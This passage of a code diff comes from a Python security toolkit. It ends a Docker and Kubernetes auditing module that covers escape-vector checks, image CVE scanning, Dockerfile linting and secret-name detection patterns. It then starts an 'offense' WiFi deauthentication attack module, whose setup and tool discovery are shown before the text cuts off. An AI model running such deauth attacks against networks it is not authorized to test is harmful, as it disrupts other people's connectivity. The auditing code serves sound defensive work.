== 'host' + else f'PID mode: {info["pid_mode"] or "container (isolated)"}', + severity='high') + + # 12. 
Secrets in environment + env_secrets = [] + for e in info.get('env', []): + key = e.split('=', 1)[0] if '=' in e else e + if SECRET_PATTERNS.search(key): + env_secrets.append(key) + check('Environment Secrets', + len(env_secrets) == 0, + f'Possible secrets in ENV: {", ".join(env_secrets)}' if env_secrets + else 'No obvious secrets in environment variables', + severity='medium') + + score = int((passed / total) * 100) if total > 0 else 0 + + result = { + 'container_id': container_id, + 'name': info.get('name', ''), + 'image': info.get('image', ''), + 'score': score, + 'passed': passed, + 'total': total, + 'findings': findings, + } + + self._results['container_audits'][container_id] = result + self._save_results() + return result + + # ── Image Operations ───────────────────────────────────────────────────── + + def list_images(self) -> list: + """List local Docker images.""" + docker = find_tool('docker') + if not docker: + return [] + + fmt = '{{json .}}' + ok, raw = self._run(f'"{docker}" images --format "{fmt}"') + if not ok: + return [] + + images = [] + for line in raw.splitlines(): + line = line.strip() + if not line: + continue + try: + img = json.loads(line) + images.append({ + 'id': img.get('ID', ''), + 'repo': img.get('Repository', ''), + 'tag': img.get('Tag', ''), + 'size': img.get('Size', ''), + 'created': img.get('CreatedAt', img.get('CreatedSince', '')), + }) + except (json.JSONDecodeError, ValueError): + continue + return images + + def scan_image(self, image_name: str) -> dict: + """Scan a container image for CVEs using trivy or grype.""" + # Try trivy first + trivy = find_tool('trivy') + if trivy: + ok, raw = self._run( + f'"{trivy}" image --format json --severity CRITICAL,HIGH,MEDIUM,LOW ' + f'--quiet "{image_name}"', + timeout=120 + ) + if ok: + return self._parse_trivy(raw, image_name) + + # Fallback to grype + grype = find_tool('grype') + if grype: + ok, raw = self._run( + f'"{grype}" "{image_name}" -o json --quiet', + timeout=120 + ) + if ok: + 
return self._parse_grype(raw, image_name) + + return { + 'image': image_name, + 'scanner': None, + 'error': 'No scanner available. Install trivy or grype.', + 'vulnerabilities': [], + 'summary': {}, + } + + def _parse_trivy(self, raw: str, image_name: str) -> dict: + """Parse Trivy JSON output.""" + vulns = [] + summary = {'CRITICAL': 0, 'HIGH': 0, 'MEDIUM': 0, 'LOW': 0} + try: + data = json.loads(raw) + results = data.get('Results', []) + for r in results: + for v in r.get('Vulnerabilities', []): + sev = v.get('Severity', 'UNKNOWN').upper() + entry = { + 'cve': v.get('VulnerabilityID', ''), + 'severity': sev, + 'package': v.get('PkgName', ''), + 'installed_version': v.get('InstalledVersion', ''), + 'fixed_version': v.get('FixedVersion', ''), + 'title': v.get('Title', ''), + } + vulns.append(entry) + if sev in summary: + summary[sev] += 1 + except (json.JSONDecodeError, ValueError): + return {'image': image_name, 'scanner': 'trivy', + 'error': 'Failed to parse trivy output', 'vulnerabilities': [], 'summary': {}} + + result = { + 'image': image_name, + 'scanner': 'trivy', + 'vulnerabilities': vulns, + 'summary': summary, + 'total': len(vulns), + } + self._results['image_scans'][image_name] = result + self._save_results() + return result + + def _parse_grype(self, raw: str, image_name: str) -> dict: + """Parse Grype JSON output.""" + vulns = [] + summary = {'CRITICAL': 0, 'HIGH': 0, 'MEDIUM': 0, 'LOW': 0} + try: + data = json.loads(raw) + for m in data.get('matches', []): + v = m.get('vulnerability', {}) + sev = v.get('severity', 'Unknown').upper() + pkg = m.get('artifact', {}) + fixed = '' + fix_vers = v.get('fix', {}).get('versions', []) + if fix_vers: + fixed = fix_vers[0] + entry = { + 'cve': v.get('id', ''), + 'severity': sev, + 'package': pkg.get('name', ''), + 'installed_version': pkg.get('version', ''), + 'fixed_version': fixed, + 'title': v.get('description', '')[:120], + } + vulns.append(entry) + if sev in summary: + summary[sev] += 1 + except 
(json.JSONDecodeError, ValueError): + return {'image': image_name, 'scanner': 'grype', + 'error': 'Failed to parse grype output', 'vulnerabilities': [], 'summary': {}} + + result = { + 'image': image_name, + 'scanner': 'grype', + 'vulnerabilities': vulns, + 'summary': summary, + 'total': len(vulns), + } + self._results['image_scans'][image_name] = result + self._save_results() + return result + + # ── Dockerfile Linting ─────────────────────────────────────────────────── + + def lint_dockerfile(self, content: str) -> list: + """Lint a Dockerfile for security issues.""" + findings = [] + lines = content.splitlines() + has_user = False + has_healthcheck = False + consecutive_run = 0 + max_consecutive_run = 0 + + for i, raw_line in enumerate(lines, 1): + line = raw_line.strip() + if not line or line.startswith('#'): + consecutive_run = 0 + continue + + upper = line.upper() + + # FROM :latest + if upper.startswith('FROM '): + img = line[5:].strip().split(' ')[0] + if ':' not in img or img.endswith(':latest'): + findings.append({ + 'rule': 'DL001', 'line': i, + 'severity': DOCKERFILE_RULES['DL001']['severity'], + 'title': DOCKERFILE_RULES['DL001']['title'], + 'detail': f'Image "{img}" — pin a specific version tag.', + }) + + # USER directive + if upper.startswith('USER '): + has_user = True + + # HEALTHCHECK + if upper.startswith('HEALTHCHECK '): + has_healthcheck = True + + # ADD vs COPY + if upper.startswith('ADD ') and not line.strip().startswith('ADD --from'): + parts = line[4:].strip() + # Skip if it's a URL (ADD has valid URL use) + if not parts.startswith('http://') and not parts.startswith('https://'): + findings.append({ + 'rule': 'DL003', 'line': i, + 'severity': DOCKERFILE_RULES['DL003']['severity'], + 'title': DOCKERFILE_RULES['DL003']['title'], + 'detail': f'Line {i}: prefer COPY over ADD for local files.', + }) + + # Secrets in ENV/ARG + if upper.startswith('ENV ') or upper.startswith('ARG '): + key = line.split()[1] if len(line.split()) > 1 else '' + key 
= key.split('=')[0] + if SECRET_PATTERNS.search(key): + findings.append({ + 'rule': 'DL004', 'line': i, + 'severity': DOCKERFILE_RULES['DL004']['severity'], + 'title': DOCKERFILE_RULES['DL004']['title'], + 'detail': f'Line {i}: "{key}" looks like a secret. Use --secret instead.', + }) + + # apt-get without --no-install-recommends + if 'apt-get install' in line and '--no-install-recommends' not in line: + findings.append({ + 'rule': 'DL006', 'line': i, + 'severity': DOCKERFILE_RULES['DL006']['severity'], + 'title': DOCKERFILE_RULES['DL006']['title'], + 'detail': f'Line {i}: add --no-install-recommends to reduce image size.', + }) + + # COPY/ADD of sensitive files + if upper.startswith('COPY ') or upper.startswith('ADD '): + if SENSITIVE_FILE_PATTERNS.search(line): + findings.append({ + 'rule': 'DL009', 'line': i, + 'severity': DOCKERFILE_RULES['DL009']['severity'], + 'title': DOCKERFILE_RULES['DL009']['title'], + 'detail': f'Line {i}: copying potentially sensitive file into image.', + }) + + # sudo in RUN + if upper.startswith('RUN ') and 'sudo ' in line: + findings.append({ + 'rule': 'DL010', 'line': i, + 'severity': DOCKERFILE_RULES['DL010']['severity'], + 'title': DOCKERFILE_RULES['DL010']['title'], + 'detail': f'Line {i}: avoid sudo in Dockerfiles.', + }) + + # Consecutive RUN + if upper.startswith('RUN '): + consecutive_run += 1 + if consecutive_run > max_consecutive_run: + max_consecutive_run = consecutive_run + else: + consecutive_run = 0 + + # Post-scan checks + if not has_user: + findings.append({ + 'rule': 'DL002', 'line': 0, + 'severity': DOCKERFILE_RULES['DL002']['severity'], + 'title': DOCKERFILE_RULES['DL002']['title'], + 'detail': 'No USER directive found. Container will run as root.', + }) + + if not has_healthcheck: + findings.append({ + 'rule': 'DL005', 'line': 0, + 'severity': DOCKERFILE_RULES['DL005']['severity'], + 'title': DOCKERFILE_RULES['DL005']['title'], + 'detail': 'No HEALTHCHECK instruction. 
Add one for orchestration.', + }) + + if max_consecutive_run >= 3: + findings.append({ + 'rule': 'DL011', 'line': 0, + 'severity': DOCKERFILE_RULES['DL011']['severity'], + 'title': DOCKERFILE_RULES['DL011']['title'], + 'detail': f'{max_consecutive_run} consecutive RUN commands. Chain with && to reduce layers.', + }) + + # Check for missing cache cleanup + if 'apt-get install' in content and 'rm -rf /var/lib/apt/lists' not in content: + findings.append({ + 'rule': 'DL007', 'line': 0, + 'severity': DOCKERFILE_RULES['DL007']['severity'], + 'title': DOCKERFILE_RULES['DL007']['title'], + 'detail': 'apt-get install used without cleaning /var/lib/apt/lists/*.', + }) + + self._results['dockerfile_lints'] = findings + self._save_results() + return findings + + # ── Container Escape Detection ─────────────────────────────────────────── + + def check_escape_vectors(self, container_id: str) -> dict: + """Check for container escape possibilities.""" + info = self.inspect_container(container_id) + if 'error' in info: + return info + + vectors = [] + + def vec(name, risk, exploitable, detail): + vectors.append({ + 'vector': name, + 'risk': risk, + 'exploitable': exploitable, + 'detail': detail, + }) + + # 1. Privileged mode — full escape + if info['privileged']: + vec('Privileged Mode', 'critical', True, + 'Container has full access to host devices and kernel. ' + 'Trivial escape via mounting host filesystem.') + + # 2. Docker socket mount + sock_mounted = any( + '/var/run/docker.sock' in m.get('source', '') or + '/run/docker.sock' in m.get('source', '') + for m in info['mounts'] + ) + if sock_mounted: + vec('Docker Socket Mount', 'critical', True, + 'Docker socket mounted inside container. Attacker can spawn ' + 'privileged containers on the host.') + + # 3. SYS_ADMIN capability + if 'SYS_ADMIN' in info.get('cap_add', []): + vec('SYS_ADMIN Capability', 'high', True, + 'SYS_ADMIN allows mounting filesystems, modifying cgroups. 
' + 'Combined with other misconfigs, can lead to escape.') + + # 4. SYS_PTRACE capability + if 'SYS_PTRACE' in info.get('cap_add', []): + vec('SYS_PTRACE Capability', 'high', True, + 'SYS_PTRACE allows process injection and debugging. ' + 'Can be used to escape via process injection into host PID.') + + # 5. Host PID namespace + if info.get('pid_mode') == 'host': + vec('Host PID Namespace', 'high', True, + 'Container shares PID namespace with host. Processes visible ' + 'and injectable from container.') + + # 6. Host network namespace + if info.get('network_mode') == 'host': + vec('Host Network Namespace', 'medium', False, + 'Container shares host network stack. Can sniff host traffic ' + 'and access services on localhost.') + + # 7. /proc write access + proc_mounted = any( + m.get('destination', '').startswith('/proc') and m.get('rw', True) + for m in info['mounts'] + ) + if proc_mounted: + vec('/proc Write Access', 'high', True, + 'Writable /proc mount can enable kernel parameter modification ' + 'and cgroup escape techniques.') + + # 8. Kernel version (check for known container escape CVEs) + ok, uname = self._run('uname -r 2>/dev/null') + if ok and uname: + kernel = uname.strip() + # Known vulnerable kernel ranges (simplified check) + vec('Kernel Version', 'info', False, + f'Host kernel: {kernel}. Check against CVE-2022-0185, ' + f'CVE-2022-0847 (DirtyPipe), CVE-2021-22555.') + + # 9. Cgroup escape + if info['privileged'] or 'SYS_ADMIN' in info.get('cap_add', []): + vec('Cgroup Escape', 'critical' if info['privileged'] else 'high', True, + 'Privileged + cgroup v1 release_agent technique enables full ' + 'host command execution.') + + # 10. Seccomp disabled + if any('seccomp=unconfined' in opt for opt in info.get('security_opt', [])): + vec('Seccomp Disabled', 'medium', False, + 'No seccomp filter. All syscalls available including ' + 'those needed for escape techniques.') + + # 11. 
AppArmor disabled + if any('apparmor=unconfined' in opt for opt in info.get('security_opt', [])): + vec('AppArmor Disabled', 'medium', False, + 'No AppArmor confinement. Reduced protection against ' + 'filesystem and network abuse.') + + risk_score = 0 + for v in vectors: + w = {'critical': 40, 'high': 25, 'medium': 10, 'low': 5, 'info': 0} + risk_score += w.get(v['risk'], 0) + risk_score = min(risk_score, 100) + + result = { + 'container_id': container_id, + 'name': info.get('name', ''), + 'vectors': vectors, + 'risk_score': risk_score, + 'total_vectors': len(vectors), + 'exploitable': sum(1 for v in vectors if v['exploitable']), + } + + self._results['escape_checks'][container_id] = result + self._save_results() + return result + + # ── Kubernetes Operations ──────────────────────────────────────────────── + + def _kubectl(self, args: str, timeout: int = 30) -> tuple: + kubectl = find_tool('kubectl') + if not kubectl: + return False, 'kubectl not found' + return self._run(f'"{kubectl}" {args}', timeout=timeout) + + def _kubectl_json(self, args: str, timeout: int = 30) -> tuple: + kubectl = find_tool('kubectl') + if not kubectl: + return False, 'kubectl not found' + return self._run_json(f'"{kubectl}" {args} -o json', timeout=timeout) + + def k8s_get_namespaces(self) -> list: + """List Kubernetes namespaces.""" + ok, data = self._kubectl_json('get namespaces') + if not ok: + return [] + namespaces = [] + for item in data.get('items', []): + meta = item.get('metadata', {}) + namespaces.append({ + 'name': meta.get('name', ''), + 'status': item.get('status', {}).get('phase', ''), + 'age': meta.get('creationTimestamp', ''), + }) + return namespaces + + def k8s_get_pods(self, namespace: str = 'default') -> list: + """List pods in a namespace.""" + ok, data = self._kubectl_json(f'get pods -n {namespace}') + if not ok: + return [] + pods = [] + for item in data.get('items', []): + meta = item.get('metadata', {}) + spec = item.get('spec', {}) + status = item.get('status', 
{}) + containers = [c.get('name', '') for c in spec.get('containers', [])] + pod_status = status.get('phase', 'Unknown') + conditions = status.get('conditions', []) + ready = any(c.get('type') == 'Ready' and c.get('status') == 'True' + for c in conditions) + pods.append({ + 'name': meta.get('name', ''), + 'namespace': meta.get('namespace', namespace), + 'status': pod_status, + 'ready': ready, + 'containers': containers, + 'node': spec.get('nodeName', ''), + 'age': meta.get('creationTimestamp', ''), + 'restart_count': sum( + cs.get('restartCount', 0) + for cs in status.get('containerStatuses', []) + ), + }) + return pods + + def k8s_audit_rbac(self, namespace: Optional[str] = None) -> dict: + """Audit RBAC for overly permissive bindings.""" + findings = [] + + # Cluster role bindings + ok, data = self._kubectl_json('get clusterrolebindings') + if ok: + for item in data.get('items', []): + meta = item.get('metadata', {}) + role_ref = item.get('roleRef', {}) + subjects = item.get('subjects', []) + + if role_ref.get('name') == 'cluster-admin': + for subj in subjects: + findings.append({ + 'severity': 'critical', + 'type': 'cluster-admin binding', + 'binding': meta.get('name', ''), + 'subject': f'{subj.get("kind", "")}/{subj.get("name", "")}', + 'detail': 'cluster-admin grants full cluster access', + }) + + # Check for wildcard permissions in cluster roles + ok, data = self._kubectl_json('get clusterroles') + if ok: + for item in data.get('items', []): + meta = item.get('metadata', {}) + role_name = meta.get('name', '') + for rule in item.get('rules', []): + verbs = rule.get('verbs', []) + resources = rule.get('resources', []) + api_groups = rule.get('apiGroups', []) + if '*' in verbs and '*' in resources: + findings.append({ + 'severity': 'high', + 'type': 'wildcard permissions', + 'binding': role_name, + 'subject': '', + 'detail': f'Role "{role_name}" has wildcard verbs and resources ' + f'on apiGroups: {api_groups}', + }) + + # Check service account token automount + 
ns_flag = f'-n {namespace}' if namespace else '--all-namespaces' + ok, data = self._kubectl_json(f'get serviceaccounts {ns_flag}') + if ok: + for item in data.get('items', []): + meta = item.get('metadata', {}) + automount = item.get('automountServiceAccountToken', True) + if automount and meta.get('name') != 'default': + findings.append({ + 'severity': 'low', + 'type': 'token automount', + 'binding': meta.get('name', ''), + 'subject': f'namespace/{meta.get("namespace", "")}', + 'detail': f'SA "{meta.get("name")}" has automountServiceAccountToken enabled', + }) + + result = {'findings': findings, 'total': len(findings)} + self._results['k8s_audits']['rbac'] = result + self._save_results() + return result + + def k8s_check_secrets(self, namespace: str = 'default') -> dict: + """Check for exposed or unencrypted secrets.""" + findings = [] + + ok, data = self._kubectl_json(f'get secrets -n {namespace}') + if not ok: + return {'error': 'Cannot list secrets', 'findings': []} + + for item in data.get('items', []): + meta = item.get('metadata', {}) + secret_type = item.get('type', '') + secret_name = meta.get('name', '') + data_keys = list((item.get('data') or {}).keys()) + + # Check for default token (legacy, pre-1.24) + if secret_type == 'kubernetes.io/service-account-token': + findings.append({ + 'severity': 'info', + 'name': secret_name, + 'type': secret_type, + 'detail': f'SA token secret with keys: {", ".join(data_keys)}', + }) + + # Check for Opaque secrets with suspicious names + if secret_type == 'Opaque': + for key in data_keys: + if SECRET_PATTERNS.search(key): + findings.append({ + 'severity': 'medium', + 'name': secret_name, + 'type': secret_type, + 'detail': f'Key "{key}" may contain credentials', + }) + + # Check which pods mount secrets + ok, pod_data = self._kubectl_json(f'get pods -n {namespace}') + if ok: + for pod in pod_data.get('items', []): + pod_name = pod.get('metadata', {}).get('name', '') + volumes = pod.get('spec', {}).get('volumes', []) + for 
vol in volumes: + if vol.get('secret'): + findings.append({ + 'severity': 'info', + 'name': vol['secret'].get('secretName', ''), + 'type': 'mounted', + 'detail': f'Secret mounted in pod "{pod_name}"', + }) + + result = {'findings': findings, 'total': len(findings), 'namespace': namespace} + self._results['k8s_audits']['secrets'] = result + self._save_results() + return result + + def k8s_check_network_policies(self, namespace: str = 'default') -> dict: + """Check if network policies exist and find unprotected pods.""" + findings = [] + + ok, data = self._kubectl_json(f'get networkpolicies -n {namespace}') + policies = data.get('items', []) if ok else [] + + if not policies: + findings.append({ + 'severity': 'high', + 'type': 'no_policies', + 'detail': f'No NetworkPolicies found in namespace "{namespace}". ' + f'All pod-to-pod traffic is allowed.', + }) + return {'findings': findings, 'total': 1, 'namespace': namespace, + 'policy_count': 0, 'unprotected_pods': []} + + # Collect pod selectors covered by policies + covered_labels = set() + for pol in policies: + spec = pol.get('spec', {}) + selector = spec.get('podSelector', {}) + match_labels = selector.get('matchLabels', {}) + if not match_labels: + covered_labels.add('__all__') + else: + for k, v in match_labels.items(): + covered_labels.add(f'{k}={v}') + + # Check pods without matching policies + unprotected = [] + if '__all__' not in covered_labels: + ok, pod_data = self._kubectl_json(f'get pods -n {namespace}') + if ok: + for pod in pod_data.get('items', []): + meta = pod.get('metadata', {}) + labels = meta.get('labels', {}) + pod_labels = {f'{k}={v}' for k, v in labels.items()} + if not pod_labels.intersection(covered_labels): + unprotected.append(meta.get('name', '')) + + if unprotected: + findings.append({ + 'severity': 'medium', + 'type': 'unprotected_pods', + 'detail': f'{len(unprotected)} pod(s) not covered by any NetworkPolicy', + }) + + result = { + 'findings': findings, + 'total': len(findings), + 
'namespace': namespace, + 'policy_count': len(policies), + 'unprotected_pods': unprotected, + } + self._results['k8s_audits']['network_policies'] = result + self._save_results() + return result + + def k8s_audit_pod(self, pod_name: str, namespace: str = 'default') -> dict: + """Security audit of a Kubernetes pod.""" + ok, data = self._kubectl_json(f'get pod {pod_name} -n {namespace}') + if not ok: + return {'error': f'Cannot get pod {pod_name}'} + + spec = data.get('spec', {}) + findings = [] + passed = 0 + total = 0 + + def check(name, ok, detail='', severity='medium'): + nonlocal passed, total + total += 1 + if ok: + passed += 1 + findings.append({ + 'check': name, + 'status': 'pass' if ok else 'fail', + 'severity': severity if not ok else 'info', + 'detail': detail, + }) + + # Host namespaces + check('Host Network', + not spec.get('hostNetwork', False), + 'Pod uses host network namespace!' if spec.get('hostNetwork') else 'Isolated', + severity='high') + check('Host PID', + not spec.get('hostPID', False), + 'Pod uses host PID namespace!' if spec.get('hostPID') else 'Isolated', + severity='high') + check('Host IPC', + not spec.get('hostIPC', False), + 'Pod uses host IPC namespace!' if spec.get('hostIPC') else 'Isolated', + severity='high') + + # Per-container checks + for container in spec.get('containers', []): + c_name = container.get('name', 'unknown') + sec_ctx = container.get('securityContext', {}) + + # Privileged + priv = sec_ctx.get('privileged', False) + check(f'{c_name}: Privileged', + not priv, + 'Container is privileged!' 
if priv else 'Not privileged', + severity='critical') + + # Run as root + run_as_user = sec_ctx.get('runAsUser') + run_as_non_root = sec_ctx.get('runAsNonRoot', False) + is_root = run_as_user == 0 or (run_as_user is None and not run_as_non_root) + check(f'{c_name}: Root User', + not is_root, + f'Runs as UID {run_as_user}' if run_as_user and run_as_user != 0 + else ('runAsNonRoot=true' if run_as_non_root else 'May run as root'), + severity='medium') + + # Read-only root filesystem + ro = sec_ctx.get('readOnlyRootFilesystem', False) + check(f'{c_name}: Read-only Rootfs', + ro, + 'Root filesystem is read-only' if ro else 'Writable root filesystem', + severity='low') + + # Resource limits + resources = container.get('resources', {}) + limits = resources.get('limits', {}) + has_limits = bool(limits.get('memory') or limits.get('cpu')) + check(f'{c_name}: Resource Limits', + has_limits, + f'Limits: {limits}' if has_limits else 'No resource limits set', + severity='medium') + + # Capabilities + caps = sec_ctx.get('capabilities', {}) + cap_add = caps.get('add', []) + dangerous = [c for c in cap_add if c in DANGEROUS_CAPS] + all_dropped = 'ALL' in caps.get('drop', []) + check(f'{c_name}: Capabilities', + len(dangerous) == 0 and (all_dropped or not cap_add), + f'Dangerous caps: {", ".join(dangerous)}' if dangerous + else ('All capabilities dropped' if all_dropped else 'Default capabilities'), + severity='high' if dangerous else 'info') + + # Privilege escalation + allow_escalation = sec_ctx.get('allowPrivilegeEscalation', True) + check(f'{c_name}: Privilege Escalation', + not allow_escalation, + 'allowPrivilegeEscalation=true' if allow_escalation + else 'Privilege escalation disabled', + severity='medium') + + # Service account + sa = spec.get('serviceAccountName', 'default') + automount = spec.get('automountServiceAccountToken', True) + check('Service Account', + sa != 'default' or not automount, + f'SA: {sa}, automount: {automount}', + severity='low') + + score = 
int((passed / total) * 100) if total > 0 else 0 + result = { + 'pod': pod_name, + 'namespace': namespace, + 'score': score, + 'passed': passed, + 'total': total, + 'findings': findings, + } + self._results['k8s_audits'][f'pod:{namespace}/{pod_name}'] = result + self._save_results() + return result + + # ── Export ──────────────────────────────────────────────────────────────── + + def export_results(self, fmt: str = 'json') -> dict: + """Export all audit results.""" + self._results['timestamp'] = datetime.utcnow().isoformat() + if fmt == 'json': + path = self._data_dir / f'container_sec_export_{int(time.time())}.json' + with open(path, 'w') as f: + json.dump(self._results, f, indent=2, default=str) + return {'path': str(path), 'format': 'json', 'success': True} + return {'error': f'Unsupported format: {fmt}'} + + +# ── Singleton ──────────────────────────────────────────────────────────────── + +_instance = None + + +def get_container_sec() -> ContainerSecurity: + global _instance + if _instance is None: + _instance = ContainerSecurity() + return _instance + + +# ── CLI Entry Point ────────────────────────────────────────────────────────── + +def run(): + """CLI entry point for Container Security module.""" + cs = get_container_sec() + + while True: + print(f"\n{'='*60}") + print(f" Container Security") + print(f"{'='*60}") + print() + print(" 1 — Audit Docker Host") + print(" 2 — List Containers") + print(" 3 — Audit Container") + print(" 4 — Scan Image") + print(" 5 — Lint Dockerfile") + print(" 6 — K8s Pods") + print(" 7 — K8s RBAC Audit") + print(" 0 — Back") + print() + + choice = input(" > ").strip() + + if choice == '0': + break + + elif choice == '1': + print("\n [*] Auditing Docker host...") + findings = cs.audit_docker_host() + if not findings: + print(" [-] No findings.") + for f in findings: + sev = f.get('severity', 'info').upper() + status = f.get('status', 'info').upper() + color = {'CRITICAL': Colors.RED, 'HIGH': Colors.RED, + 'MEDIUM': 
Colors.YELLOW, 'LOW': Colors.CYAN, + 'INFO': Colors.GREEN}.get(sev, Colors.WHITE) + print(f" {color}[{sev}]{Colors.RESET} {f['check']}: {f['detail']}") + + elif choice == '2': + containers = cs.list_containers(all=True) + if not containers: + print(" [-] No containers found.") + else: + print(f"\n {'ID':<14} {'Name':<25} {'Image':<30} {'Status':<15}") + print(f" {'-'*14} {'-'*25} {'-'*30} {'-'*15}") + for c in containers: + print(f" {c['id']:<14} {c['name']:<25} {c['image']:<30} {c['status']:<15}") + + elif choice == '3': + cid = input(" Container ID or name: ").strip() + if cid: + print(f"\n [*] Auditing container {cid}...") + result = cs.audit_container(cid) + if 'error' in result: + print(f" [!] {result['error']}") + else: + print(f"\n Security Score: {result['score']}% ({result['passed']}/{result['total']})") + for f in result['findings']: + sym = '+' if f['status'] == 'pass' else '!' + color = Colors.GREEN if f['status'] == 'pass' else Colors.YELLOW + print(f" {color}[{sym}]{Colors.RESET} {f['check']}: {f['detail']}") + + elif choice == '4': + img = input(" Image name (e.g., nginx:latest): ").strip() + if img: + print(f"\n [*] Scanning {img} for vulnerabilities...") + result = cs.scan_image(img) + if result.get('error'): + print(f" [!] 
{result['error']}") + else: + s = result.get('summary', {}) + print(f" Scanner: {result.get('scanner', '?')}") + print(f" Total: {result.get('total', 0)} vulnerabilities") + print(f" Critical: {s.get('CRITICAL', 0)} High: {s.get('HIGH', 0)} " + f"Medium: {s.get('MEDIUM', 0)} Low: {s.get('LOW', 0)}") + for v in result.get('vulnerabilities', [])[:20]: + print(f" {v['severity']:<8} {v['cve']:<18} {v['package']:<20} " + f"{v['installed_version']} -> {v.get('fixed_version', 'n/a')}") + + elif choice == '5': + path = input(" Path to Dockerfile: ").strip() + if path and os.path.isfile(path): + with open(path) as f: + content = f.read() + findings = cs.lint_dockerfile(content) + if not findings: + print(" [+] No issues found.") + else: + print(f"\n Found {len(findings)} issue(s):") + for f in findings: + sev = f.get('severity', 'info').upper() + line = f"line {f['line']}" if f.get('line') else 'general' + print(f" [{sev}] {f['rule']}: {f['title']} ({line})") + print(f" {f['detail']}") + else: + print(" [!] 
File not found.") + + elif choice == '6': + ns = input(" Namespace (default): ").strip() or 'default' + pods = cs.k8s_get_pods(namespace=ns) + if not pods: + print(" [-] No pods found.") + else: + print(f"\n {'Name':<35} {'Status':<12} {'Node':<20} {'Restarts':<10}") + print(f" {'-'*35} {'-'*12} {'-'*20} {'-'*10}") + for p in pods: + print(f" {p['name']:<35} {p['status']:<12} {p['node']:<20} {p['restart_count']:<10}") + + elif choice == '7': + ns = input(" Namespace (blank for all): ").strip() or None + print("\n [*] Auditing RBAC...") + result = cs.k8s_audit_rbac(namespace=ns) + if not result.get('findings'): + print(" [+] No RBAC issues found.") + else: + print(f" Found {result['total']} issue(s):") + for f in result['findings']: + sev = f.get('severity', 'info').upper() + print(f" [{sev}] {f['type']}: {f.get('binding', '')} — {f['detail']}") diff --git a/modules/deauth.py b/modules/deauth.py new file mode 100644 index 0000000..4c09b87 --- /dev/null +++ b/modules/deauth.py @@ -0,0 +1,1287 @@ +"""AUTARCH Deauth Attack Module + +Targeted and broadcast WiFi deauthentication, multi-target attacks, +continuous mode, channel hopping, and client discovery for wireless +assessments. Designed for Raspberry Pi and SBCs with monitor-mode adapters. 
+""" + +DESCRIPTION = "WiFi deauthentication — targeted & broadcast attacks" +AUTHOR = "darkHal" +VERSION = "1.0" +CATEGORY = "offense" + +import os +import re +import sys +import json +import time +import shutil +import signal +import struct +import threading +import subprocess +from pathlib import Path +from datetime import datetime +from typing import Dict, List, Optional, Any + +try: + from core.paths import find_tool, get_data_dir +except ImportError: + def find_tool(name): + return shutil.which(name) + def get_data_dir(): + return str(Path(__file__).parent.parent / 'data') + +sys.path.insert(0, str(Path(__file__).parent.parent)) +try: + from core.banner import Colors, clear_screen, display_banner +except ImportError: + class Colors: + RED = YELLOW = GREEN = CYAN = WHITE = DIM = RESET = BOLD = MAGENTA = "" + def clear_screen(): pass + def display_banner(): pass + + +# ── Singleton ──────────────────────────────────────────────────────────────── + +_instance = None + +def get_deauth(): + """Return singleton DeauthAttack instance.""" + global _instance + if _instance is None: + _instance = DeauthAttack() + return _instance + + +# ── Helpers ────────────────────────────────────────────────────────────────── + +MAC_RE = re.compile(r'^([0-9A-Fa-f]{2}:){5}[0-9A-Fa-f]{2}$') +BROADCAST = 'FF:FF:FF:FF:FF:FF' + + +def _validate_mac(mac: str) -> bool: + return bool(MAC_RE.match(mac)) + + +def _run(cmd, timeout=30) -> tuple: + """Run a command, return (success, stdout).""" + try: + result = subprocess.run( + cmd, shell=isinstance(cmd, str), + capture_output=True, text=True, timeout=timeout + ) + return result.returncode == 0, result.stdout.strip() + except subprocess.TimeoutExpired: + return False, 'Command timed out' + except Exception as e: + return False, str(e) + + +def _run_bg(cmd) -> Optional[subprocess.Popen]: + """Start a background process, return Popen or None.""" + try: + proc = subprocess.Popen( + cmd, shell=isinstance(cmd, str), + stdout=subprocess.PIPE, 
stderr=subprocess.PIPE, + text=True + ) + return proc + except Exception: + return None + + +# ── DeauthAttack Class ─────────────────────────────────────────────────────── + +class DeauthAttack: + """WiFi deauthentication attack toolkit.""" + + def __init__(self): + # Data directory + data_root = get_data_dir() + if isinstance(data_root, Path): + data_root = str(data_root) + self.data_dir = os.path.join(data_root, 'deauth') + os.makedirs(self.data_dir, exist_ok=True) + + self.history_path = os.path.join(self.data_dir, 'history.json') + + # Tool paths + self.aireplay = find_tool('aireplay-ng') or shutil.which('aireplay-ng') + self.airmon = find_tool('airmon-ng') or shutil.which('airmon-ng') + self.airodump = find_tool('airodump-ng') or shutil.which('airodump-ng') + self.mdk3 = find_tool('mdk3') or shutil.which('mdk3') + self.mdk4 = find_tool('mdk4') or shutil.which('mdk4') + self.iw = shutil.which('iw') + self.ip_cmd = shutil.which('ip') + self.iwconfig = shutil.which('iwconfig') + + # Scapy availability + self._scapy = None + try: + from scapy.all import ( + Dot11, Dot11Deauth, RadioTap, sendp, sniff, conf + ) + self._scapy = True + except ImportError: + self._scapy = False + + # Attack state + self._continuous_thread: Optional[threading.Thread] = None + self._continuous_running = False + self._continuous_target = {} + self._continuous_frames_sent = 0 + self._continuous_start_time = 0.0 + + # Channel hopping state + self._hop_thread: Optional[threading.Thread] = None + self._hop_running = False + self._current_channel = 0 + + # Attack history + self._history: List[Dict] = [] + self._load_history() + + # ── Tool Status ────────────────────────────────────────────────────── + + def get_tools_status(self) -> Dict[str, Any]: + """Return availability of all tools used by this module.""" + return { + 'aireplay-ng': self.aireplay is not None, + 'airmon-ng': self.airmon is not None, + 'airodump-ng': self.airodump is not None, + 'mdk3': self.mdk3 is not None, + 'mdk4': 
self.mdk4 is not None, + 'iw': self.iw is not None, + 'ip': self.ip_cmd is not None, + 'iwconfig': self.iwconfig is not None, + 'scapy': self._scapy is True, + } + + # ── Interface Management ───────────────────────────────────────────── + + def get_interfaces(self) -> List[Dict]: + """List wireless interfaces with mode info.""" + interfaces = [] + + # Try iw dev first + if self.iw: + try: + out = subprocess.check_output( + [self.iw, 'dev'], text=True, timeout=5 + ) + iface = None + for line in out.splitlines(): + line = line.strip() + if line.startswith('Interface'): + if iface: + interfaces.append(iface) + iface = { + 'name': line.split()[-1], + 'mode': 'managed', + 'channel': 0, + 'mac': '', + 'phy': '' + } + elif iface: + if line.startswith('type'): + iface['mode'] = line.split()[-1] + elif line.startswith('channel'): + try: + iface['channel'] = int(line.split()[1]) + except (ValueError, IndexError): + pass + elif line.startswith('addr'): + iface['mac'] = line.split()[-1] + if iface: + interfaces.append(iface) + except Exception: + pass + + # Fallback to iwconfig + if not interfaces and self.iwconfig: + try: + out = subprocess.check_output( + [self.iwconfig], text=True, + stderr=subprocess.DEVNULL, timeout=5 + ) + for block in out.split('\n\n'): + if 